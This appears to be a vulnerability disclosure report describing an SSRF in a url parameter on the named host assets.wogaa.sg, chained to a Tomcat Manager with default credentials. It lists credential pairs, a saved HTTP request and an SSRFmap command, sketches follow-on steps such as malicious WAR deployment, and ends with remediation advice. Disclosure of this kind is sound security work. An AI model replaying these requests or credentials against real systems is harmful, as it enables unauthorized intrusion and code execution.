Apache Tomcat Manager: Default Credentials & SSRF Exploitation

Target: assets.wogaa.sg  |  CVSS: 9.8 (Critical)  |  Weakness: Use of Default Credentials / SSRF chaining

⎈ Vulnerability Summary

Vulnerability Description

Vulnerable Component: Apache Tomcat Manager Interface — exposed via SSRF reachable from the asset endpoint. The Tomcat Manager administrative interface is protected by default credentials that remain active in the target environment. Although the Manager UI is not directly internet-facing, the presence of a server-side request forgery (SSRF) vulnerability on assets.wogaa.sg allows an unauthenticated attacker to pivot internally and access the Tomcat Manager.

The following default credential pairs were confirmed active on the Tomcat service associated with the asset:

tomcat:password
admin:password
both:password
manager:password
role:password
role1:password
root:password

Steps to Reproduce (2 vectors)

Vector 1 — Direct credential check on Tomcat service: Attempt to access Tomcat Manager endpoints using standard default credentials. While the manager port is not globally exposed, SSRF enables the attack.

Vector 2 — SSRF via SSRFmap (Tomcat module): The parameter url inside /scripts/wogaa.js is vulnerable to SSRF. By leveraging the tomcat module from SSRFmap, an attacker can scan for the Tomcat Manager and authenticate using default credentials.

# saved request file: habx
GET /scripts/wogaa.js?url=https%3A%2F%2Fwww.moe.gov.sg%2F%3Finw%3D0 HTTP/2
Host: assets.wogaa.sg
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
If-None-Match: W/"cea9-kyrOtXv2JgF8fJgH/PqUFE3/2qM"
Priority: u=0, i

# command execution
python3 ssrfmap.py -r habx -p "url=https://assets.wogaa.sg" -m tomcat

Result excerpt (first section): tomcat:password is printed, confirming valid default credentials via Tomcat Manager SSRF probe. The full output also reveals internal Tomcat version and accessible endpoints.

Technical Deep Dive & Exploitation Chain

The attack vector abuses an unvalidated URL parameter in a server-side request made by assets.wogaa.sg. The application fetches resources from user-supplied url values, allowing an attacker to target internal services such as localhost:8080/manager. Because Tomcat's Manager interface ships with known default credentials (unchanged in the environment), the SSRF becomes a full authentication bypass. After successful authentication, an attacker could:

• Deploy a malicious WAR file → remote code execution on the Tomcat host.
• Read sensitive configuration files (context.xml, tomcat-users.xml).
• Access internal network resources (further pivot).

Impact Analysis (Blast Radius)

Remediation Recommendations

⎈ Immediate Actions:
- Rotate credentials IMMEDIATELY (even if the interface is "hidden")
- Remove default users (tomcat, admin, manager, role, role1, root) from tomcat-users.xml
- Apply strict network controls: block internal requests from SSRF-prone endpoints
- Disable Tomcat Manager entirely if not required for production

⎈ Long-term hardening:
- Implement SSRF filtering: validate URL allowlists, reject internal IPs (127.0.0.1, 10.0.0.0/8, 169.254.169.254)
- Use principle of least privilege for Tomcat service account
- Audit for similar parameter injections across the application

Supporting Artifacts

The researcher demonstrated successful exploitation by retrieving the Tomcat version and receiving a valid JSESSIONID after presenting default credentials. Full logs and screen captures are available internally.